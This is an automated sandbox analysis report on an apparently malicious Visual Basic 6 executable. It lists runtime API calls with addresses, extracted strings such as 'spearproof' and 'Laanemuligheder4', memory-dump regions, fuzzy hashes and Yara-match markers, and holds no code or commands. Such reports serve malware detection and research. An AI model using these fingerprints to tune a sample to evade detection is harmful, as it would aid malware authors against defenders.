__vbaSetSystemError.MSVBVM60(00000000,?,spearproof), ref: 00430D34
__vbaFreeStr.MSVBVM60(00000000,?,spearproof), ref: 00430D53
#610.MSVBVM60(?,00000000,?,spearproof), ref: 00430D68
#552.MSVBVM60(?,?,00000001,?,00000000,?,spearproof), ref: 00430D7D
__vbaVarMove.MSVBVM60(?,?,00000001,?,00000000,?,spearproof), ref: 00430D8E
__vbaFreeVar.MSVBVM60(?,?,00000001,?,00000000,?,spearproof), ref: 00430D99
__vbaNew2.MSVBVM60(0042F964,00434454,?,?,00000001,?,00000000,?,spearproof), ref: 00430DB0
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,00000044), ref: 00430E7D
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00430EB6
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00430EC1
__vbaNew2.MSVBVM60(0042FCF0,00434010,00000000,?,spearproof), ref: 00430EDC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00430EFC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000108), ref: 00430F25
__vbaStrToAnsi.MSVBVM60(?,?), ref: 00430F37
__vbaStrToAnsi.MSVBVM60(?,Laanemuligheder4,00000000,?,?), ref: 00430F49
__vbaSetSystemError.MSVBVM60(00000000,?,Laanemuligheder4,00000000,?,?), ref: 00430F5A
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Laanemuligheder4,00000000,?,?), ref: 00430F8A
__vbaFreeObj.MSVBVM60(?), ref: 00430F98
__vbaNew2.MSVBVM60(0042F964,00434454,?), ref: 00430FBA
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,00000014), ref: 00430FE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F9AC,000000D0), ref: 00431010
__vbaStrMove.MSVBVM60(00000000,?,0042F9AC,000000D0), ref: 00431027
__vbaFreeObj.MSVBVM60(00000000,?,0042F9AC,000000D0), ref: 00431032
__vbaNew2.MSVBVM60(0042F964,00434454), ref: 00431049
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,0000001C), ref: 00431070
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F9BC,0000005C,?,?,?,?,?), ref: 004310BC
__vbaStrMove.MSVBVM60(?,?,?,?,?), ref: 004310D4
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 004310DF
__vbaNew2.MSVBVM60(0042FCF0,00434010,?), ref: 004310F9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431114
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9CC,000000F0), ref: 0043113D
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 0043114D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431168
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9DC,000000E8), ref: 00431191
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 004311A1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004311BC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000130), ref: 004311E5
__vbaStrMove.MSVBVM60(00000000,00000000,0042F99C,00000130), ref: 004311FD
__vbaStrCopy.MSVBVM60(00000000,00000000,0042F99C,00000130), ref: 0043120D
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F4A8,000006F8), ref: 0043126F
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0043128B
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,00000003,?,?,?), ref: 004312A7
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 004312BA
__vbaObjSet.MSVBVM60(?,00000000), ref: 004312D5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA04,00000110), ref: 004312FE
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 0043130E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431329
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9CC,000000F8), ref: 00431354
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 00431364
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043137F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA04,00000138), ref: 004313A8
__vbaStrCopy.MSVBVM60(00000000,00000000,0042FA04,00000138), ref: 004313B8
__vbaStrMove.MSVBVM60(00000000,00000000,0042FA04,00000138), ref: 004313D0
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F4A8,000006F8), ref: 00431432
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0043144E
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,00000003,?,?,?), ref: 0043146A
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 0043147D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431498
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000068), ref: 004314BB
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 004314CB
__vbaObjSet.MSVBVM60(?,00000000), ref: 004314E6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9CC,00000060), ref: 00431509
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00182DD5,?), ref: 004315A4
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,00182DD5,?), ref: 004315B7
__vbaObjSet.MSVBVM60(?,00000000,?,00182DD5,?), ref: 004315D2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA2C,00000060,?,00182DD5,?), ref: 004315F5
__vbaFreeObj.MSVBVM60(?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043165C
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043166C
__vbaObjSet.MSVBVM60(?,00000000,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431687
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000150,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316B0
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316C0
__vbaObjSet.MSVBVM60(?,00000000,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316DB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000070,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316FE
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043170E
__vbaObjSet.MSVBVM60(?,00000000,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431729
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9DC,00000080,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431752
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,C,?,00518CAF,?,?,4B7FFB7C,?), ref: 004317CE
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004317E1
__vbaObjSet.MSVBVM60(?,00000000,?,4B7FFB7C,?,?,00182DD5,?), ref: 004317FC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9CC,00000160,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431825
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431835
__vbaObjSet.MSVBVM60(?,00000000,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431850
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000080,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431879
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F4A8,000006FC,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431906
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043191B
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043192E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431949
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000070,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043196C
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043197C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431997
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9DC,000001C0,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319C0
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319D0
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319EB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA54,000000D0,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431A14
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F4A8,000006FC,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431AA1
__vbaFreeStr.MSVBVM60(?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431AAC
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431AC8
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431ADB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431AF6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000070,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431B19
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431B29
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431B44
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000080,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431B6D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,007F5A39,39BD99C0,?,?,?), ref: 00431BDE
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431BF1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431C0C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA04,00000060,?,?,?), ref: 00431C2F
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431C3F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431C5A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000170,?,?,?), ref: 00431C83
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5), ref: 00431C9B
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5), ref: 00431CAB
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F4A8,000006F8,?,?,?), ref: 00431D0D
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C), ref: 00431D22
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000002,00000000,?,?,?,?), ref: 00431D37

Strings

REFUSIONSSALDOERS, xrefs: 00431CA0
Lineality, xrefs: 00431202
Sprogede6, xrefs: 00431894
C, xrefs: 0043177B, 00431781
Grilleres, xrefs: 004313AD
4, xrefs: 0043157A
Laanemuligheder4, xrefs: 00430F3D
CORANTO, xrefs: 00431CDD
Codi, xrefs: 00430E45
spearproof, xrefs: 00430C3F

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$New2$Free$List$Move$AnsiCopy$ErrorSystem$#552#610Late
String ID: C$CORANTO$Codi$Grilleres$Laanemuligheder4$Lineality$REFUSIONSSALDOERS$Sprogede6$spearproof$4
API String ID: 2238139552-805979028
Opcode ID: 9211011506b695b7bd76c49dbfaeb28e6d951072550a433e97e7a50f834fcfac
Instruction ID: 826766c42bc274266e05f58c4bffe4374de5413d5ec59807cf29563132c25aa5
Opcode Fuzzy Hash: 9211011506b695b7bd76c49dbfaeb28e6d951072550a433e97e7a50f834fcfac
Instruction Fuzzy Hash: F3B24EB0A00618AFDB20DB65DC45FEB77BCAF48345F0001EEB549E7191DB78AA458F68

Uniqueness

Uniqueness Score: -1.00%

Function 00432BF5, Relevance: 27.2, APIs: 18, Instructions: 164COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00432C47
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 00432C5F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432C77
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,000001C8), ref: 00432CB3
__vbaFreeObj.MSVBVM60 ref: 00432CBB
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 00432CD3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432CEB
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,00000000), ref: 00432D13
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432D2B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9DC,00000150), ref: 00432D51
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9CC,000001EC), ref: 00432D80
__vbaFreeStr.MSVBVM60 ref: 00432D88
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00432D99
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00432DB4
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00432DBE
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00432DC6
__vbaFreeStr.MSVBVM60(00432E0E,?,000000FF,000000FE,000000FE,000000FE), ref: 00432E00
__vbaFreeStr.MSVBVM60(00432E0E,?,000000FF,000000FE,000000FE,000000FE), ref: 00432E08

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#704CopyListMove
String ID:
API String ID: 3420054063-0
Opcode ID: 4b43a4d9a90e59c437c887234cba9055fa8a06025569297198416df757f2c848
Instruction ID: 006ea33965333d6a547b93557ad78ec4a6fa81f9fb16f03b3a48719df9df0b6a
Opcode Fuzzy Hash: 4b43a4d9a90e59c437c887234cba9055fa8a06025569297198416df757f2c848
Instruction Fuzzy Hash: C8516271E00218ABCB00EFA6D985EDE7BB8AF08714F50416EF511F71E1DB78A905CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401330, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6%*), ref: 00401335

Strings

VB5!6%*, xrefs: 00401330

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: 31c332ee77c931514a8fdd1f3968ffa495fd20c23b1fabf680ba0c063111f381
Instruction ID: 8a4a1f984eeb0cb386edd053a70f91cc2a1c7a260cec5f098e50b8e2d0f38efc
Opcode Fuzzy Hash: 31c332ee77c931514a8fdd1f3968ffa495fd20c23b1fabf680ba0c063111f381
Instruction Fuzzy Hash: F071726241E3C18FD3038BB598696907FB1AE13228B1F45EBC4C1DF4B3D2AC185AD726

Uniqueness

Uniqueness Score: -1.00%

Function 002212F5, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388732370.0000000000220000.00000020.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63bca635af9bac78c8747cfb77a1dd70239b7d70636c181bb03ca7e4bd558d9
Instruction ID: 80a24a4959eb44ad5e1dfaba8d93af43ebc40a4906516381e83a38260539d616
Opcode Fuzzy Hash: c63bca635af9bac78c8747cfb77a1dd70239b7d70636c181bb03ca7e4bd558d9
Instruction Fuzzy Hash: D8D05EB130E380AFD349DB288D269967FF0AF87211B0D49EEE184CB293E615AC558752

Uniqueness

Uniqueness Score: -1.00%

Function 0042F87C, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a08582f802088a3e7ebfca93ae29b7cf9774c50990062dc4e71549542afd0e3
Instruction ID: 82818f6bf46d8e2a22889197847eea2ad4be05eea2f46d0fd68f2c1f665d88de
Opcode Fuzzy Hash: 1a08582f802088a3e7ebfca93ae29b7cf9774c50990062dc4e71549542afd0e3
Instruction Fuzzy Hash: 2CB01210384215DA5B00B254BE4162C51B092847C03F04C33F001D2290C728DC04C12E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F8D4, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e4cfa31ca8ea0d26cc9f9752528cdb6377ab42caf71e9a8128c3bcb3aa01244
Instruction ID: 3900d0fb5f16d21ef407b14c135bf39fb24e506fba1ae9614012bc2477a56b34
Opcode Fuzzy Hash: 0e4cfa31ca8ea0d26cc9f9752528cdb6377ab42caf71e9a8128c3bcb3aa01244
Instruction Fuzzy Hash: D1B012203940119A6B007264BC4262163A0A6813803E00C77F021D1290CB28EC04576D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002E0889, Relevance: 11.8, Strings: 8, Instructions: 1811COMMON

Download Yara Rule

Strings

Lms2, xrefs: 002E0F75
QHwy, xrefs: 002E433E
p,Bd, xrefs: 002E14DE
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
Zs7#, xrefs: 002E11E8
tp, xrefs: 002E3F96
KJ$, xrefs: 002E122A

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$KJ$$Lms2$QHwy$Zs7#$p,Bd$tp$vx
API String ID: 0-1759626601
Opcode ID: f98c57f9595dd422f2f48e44167de9a87ccc8ed69a93252a0a992e5a96aed0d0
Instruction ID: 85c89e6f6d0414a8051a34014acea0e9b5c11d1b7e89228b0374aed207ef4ded
Opcode Fuzzy Hash: f98c57f9595dd422f2f48e44167de9a87ccc8ed69a93252a0a992e5a96aed0d0
Instruction Fuzzy Hash: 17E2647164438A9FDF349F39CD997DA37A2EF95350F95412EDC898B254D3308A86CB02

Uniqueness

Uniqueness Score: -1.00%

Function 002E27A4, Relevance: 9.2, Strings: 6, Instructions: 1723COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
1Z, xrefs: 002E2D18
vx, xrefs: 002E41FA
80,L, xrefs: 002E284B
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$1Z$80,L$QHwy$tp$vx
API String ID: 0-3433672908
Opcode ID: 8746eaf485f126c541830ba10943a42b367bf8c3d4364a57cac98e9119b9f96b
Instruction ID: 5a9bbc59bb5d6c8983873c38b58e65d30dd2afb426c88863cd6bcae7a529cd55
Opcode Fuzzy Hash: 8746eaf485f126c541830ba10943a42b367bf8c3d4364a57cac98e9119b9f96b
Instruction Fuzzy Hash: 43E2307164038A9FDB349F39CC957DA77A2FF59350F95822EDC899B200D3309A95CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002E770F, Relevance: 8.5, Strings: 6, Instructions: 1046COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
ST, xrefs: 002E796A
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
|JC, xrefs: 002E7727
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$ST$tp$vx$|JC
API String ID: 0-1302285692
Opcode ID: f0822e4f6578cb5e64d8892734ebb4468996592517a0f7465c49e1c0c8773ed7
Instruction ID: 98fbf83b25b8e41cc721ec0dfe8c3c08b680ae18f1f336d036e3a8fa60ec4120
Opcode Fuzzy Hash: f0822e4f6578cb5e64d8892734ebb4468996592517a0f7465c49e1c0c8773ed7
Instruction Fuzzy Hash: B1923F7160438A9FDB34AF39CD957EA77A2FF55350F95812EDC899B210D3308A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E3684, Relevance: 7.2, Strings: 5, Instructions: 953COMMON

Download Yara Rule

Strings

7cHN, xrefs: 002E929D
QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$7cHN$QHwy$tp$vx
API String ID: 0-4093178063
Opcode ID: 0946aa364ee1723dc2d722b3d92dcea213a80ea412d66e870c07906766c228eb
Instruction ID: c19b118711f56c858a83fd89ca505859b1d92a660653934c186dc49027127e22
Opcode Fuzzy Hash: 0946aa364ee1723dc2d722b3d92dcea213a80ea412d66e870c07906766c228eb
Instruction Fuzzy Hash: 41823E7164038A9FDB34AF39CD997DA7BA2FF55350F95812EDC899B210D3308A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E2379, Relevance: 6.3, Strings: 4, Instructions: 1277COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$tp$vx
API String ID: 0-771500711
Opcode ID: e7268e54f2bf8e6b69f6352f48633006abcd5cdde42f8557c9add2278f2f1211
Instruction ID: f7ffbda3a1af59f2c0ac3977b623ec3c500842bcccb53b747c2d18eb33cc43e5
Opcode Fuzzy Hash: e7268e54f2bf8e6b69f6352f48633006abcd5cdde42f8557c9add2278f2f1211
Instruction Fuzzy Hash: DDB2407164438A9FDB34AF39CD957EA77A2FF55350F95812EDC899B210D3308A82CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E8C36, Relevance: 6.1, Strings: 4, Instructions: 1072COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$tp$vx
API String ID: 0-771500711
Opcode ID: 884ee7d15a1baa9e4bb5dfe3a7d5725a04fc1bcf3a79c0c2986e43a3d876e050
Instruction ID: b7bfabeff8f0edf22d7fe9feb6fae093bd2e29f50988fd7f0d1d6425f62ad1f8
Opcode Fuzzy Hash: 884ee7d15a1baa9e4bb5dfe3a7d5725a04fc1bcf3a79c0c2986e43a3d876e050
Instruction Fuzzy Hash: 9C92307164438A9FDF389E39CD953DA7BA2FF55350F95812EDC898B210C7308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E6B35, Relevance: 5.9, Strings: 4, Instructions: 863COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$tp$vx
API String ID: 0-771500711
Opcode ID: 1d45648293244661561b2d3d37d8ec79665dd72c4a76d29907d7e4aa4aef00b6
Instruction ID: d918b968ca1c0fd452ea3623bed0fffe7764f847ef046e4413633e364781dd7d
Opcode Fuzzy Hash: 1d45648293244661561b2d3d37d8ec79665dd72c4a76d29907d7e4aa4aef00b6
Instruction Fuzzy Hash: 5B723F7064038A9FDB34AF39CD957DA7BA2FF95350F95812EDC899B214D3308A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E6FAF, Relevance: 5.9, Strings: 4, Instructions: 854COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$tp$vx
API String ID: 0-771500711
Opcode ID: fd977d2032e5ba1b3177bcfb84b718d05736150479399dc4af382a0ba2b40c04
Instruction ID: 279b0aabc18d77880ade3a12ebf6d36dbf4fbe2183e2bd72b0a32c2a50ff7fee
Opcode Fuzzy Hash: fd977d2032e5ba1b3177bcfb84b718d05736150479399dc4af382a0ba2b40c04
Instruction Fuzzy Hash: B3722D7060438A9FDB34AF39CD957EA7BA2FF55350F95812EDC899B214D3308A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E0147, Relevance: 5.8, Strings: 4, Instructions: 815COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$tp$vx
API String ID: 0-771500711
Opcode ID: 4d44d49f472f5a6e3ad2aa05f29eff41773924c0de3915346898908356a21fd2
Instruction ID: 6114e458d69caf8edc93ad76d2ab1d4af679e27a240d49bbd4177c1bbc6e78de
Opcode Fuzzy Hash: 4d44d49f472f5a6e3ad2aa05f29eff41773924c0de3915346898908356a21fd2
Instruction Fuzzy Hash: E1621C7060438A9FDB34AF39CD957EA7BA2FF55350F95812EDC899B214D3308A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E7077, Relevance: 5.8, Strings: 4, Instructions: 808COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
vx, xrefs: 002E41FA
tp, xrefs: 002E3F96

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &/L$QHwy$tp$vx
API String ID: 0-771500711
Opcode ID: 0b2aaa42fbe990b98635236efd00e62da724e6d1b7e25de85c9da0ab09db2dda
Instruction ID: e579c4697dc1c5549906e40050fb06671d2284969255da59677efe0df1135892
Opcode Fuzzy Hash: 0b2aaa42fbe990b98635236efd00e62da724e6d1b7e25de85c9da0ab09db2dda
Instruction Fuzzy Hash: 59621E7060438A9FDB34AF39CD957EA7BA2FF55350F95812EDC899B214D3308A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002E3D2C, Relevance: 5.8, Strings: 4, Instructions: 791COMMON

Download Yara Rule

Strings

QHwy, xrefs: 002E433E
&/L, xrefs: 002E4378
